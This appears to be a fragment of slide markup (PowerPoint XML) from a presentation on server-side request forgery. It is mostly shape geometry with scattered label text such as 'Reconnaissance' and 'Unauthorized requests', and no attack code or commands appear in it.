                    <a:pt x="352158" y="291301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0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572216" y="6285771"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="54770" y="54957"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FFF1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902412" y="6285771"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0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902412" y="6285771"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="54770" y="325975"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="ECECE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902412" y="3957032"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0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902412" y="3957032"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="324772" y="324772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FAE3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282184" y="3416808"/>
              <a:ext cx="1256665" cy="579755"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1256665" h="579754">
                  <a:moveTo>
                    <a:pt x="691388" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681101" y="30733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095882" y="445007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085336" y="473315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084373" y="502586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093007" y="529929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="552450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138388" y="572595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170812" y="579310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204190" y="572595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234186" y="552450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251394" y="522394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256601" y="488505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249330" y="454616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229106" y="424561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202779" y="407273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172130" y="401510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140505" y="407273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="424561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691388" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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324856" y="3369563"/>
              <a:ext cx="5198745" cy="4005579"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5198745" h="4005579">
                  <a:moveTo>
                    <a:pt x="1256588" y="3516566"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1251381" y="3482683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234186" y="3452622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204188" y="3432479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170800" y="3425761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138377" y="3432479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="3452622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093000" y="3475151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084364" y="3502495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085329" y="3531768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095883" y="3560064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681101" y="3974338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3974338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4005072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691388" y="4005072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="3580511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140498" y="3597808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172121" y="3603561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202778" y="3597808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229093" y="3580511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249324" y="3550462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256588" y="3516566"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5198745" h="4005579">
                  <a:moveTo>
                    <a:pt x="5198364" y="3852418"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4517263" y="3852418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4102481" y="3438144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113022" y="3409848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113987" y="3380575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105351" y="3353231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="3330702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4059974" y="3310559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4027551" y="3303841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994162" y="3310559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964178" y="3330702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946956" y="3360763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3941762" y="3394646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3949027" y="3428542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969258" y="3458591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995572" y="3475888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026230" y="3481641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057853" y="3475888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="3458591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4506976" y="3883152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="3883152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="3852418"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5198745" h="4005579">
                  <a:moveTo>
                    <a:pt x="5198364" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4506976" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="423418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057853" y="406209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026230" y="400469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995572" y="406209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969258" y="423418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3949027" y="453453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3941762" y="487286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946956" y="521093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964178" y="551053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994162" y="571131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4027551" y="577824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4059974" y="571131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="551053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105351" y="528561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113987" y="501269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113022" y="472084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4102481" y="443865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517263" y="30607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="30607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="0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0776" y="4418076"/>
              <a:ext cx="1905000" cy="190500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826766" y="3248405"/>
            <a:ext cx="210375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Reconnaissance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26867" y="7149465"/>
            <a:ext cx="245173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Credential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ste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ng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781792" y="7068693"/>
            <a:ext cx="30168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Unauthorized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requests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934192" y="3306317"/>
            <a:ext cx="251968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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="3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co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smu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175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7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29147" y="306451"/>
            <a:ext cx="499935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">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgery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3920" y="760476"/>
            <a:ext cx="6839711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930145" y="1882292"/>
            <a:ext cx="12804140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857750" marR="5080" indent="-4845685">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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SSRF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attacks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targeted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against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cloud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infrastructure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with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web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servers.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example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server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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fo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gery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own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belo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w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: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67483" y="3022092"/>
            <a:ext cx="12821920" cy="5455920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12821919" h="5455920">
                <a:moveTo>
                  <a:pt x="12525375" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="296037" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247998" y="3872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202435" y="15084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159955" y="33028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121167" y="57095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86677" y="86677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57095" y="121167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33028" y="159955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15084" y="202435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3872" y="247998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="296037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5159933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3872" y="5207945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15084" y="5253490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33028" y="5295959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57095" y="5334741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86677" y="5369229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121167" y="5398813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159955" y="5422883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202435" y="5440830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247998" y="5452046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296037" y="5455920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12525375" y="5455920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12573413" y="5452046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12618976" y="5440830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12661456" y="5422883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12700244" y="5398813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12734734" y="5369229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764316" y="5334741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12788383" y="5295959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806327" y="5253490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12817539" y="5207945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12821412" y="5159933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12821412" y="296037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12817539" y="247998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806327" y="202435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12788383" y="159955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764316" y="121167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12734734" y="86677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12700244" y="57095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12661456" y="33028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12618976" y="15084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12573413" y="3872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12525375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082289" y="3438271"/>
            <a:ext cx="79502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165" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
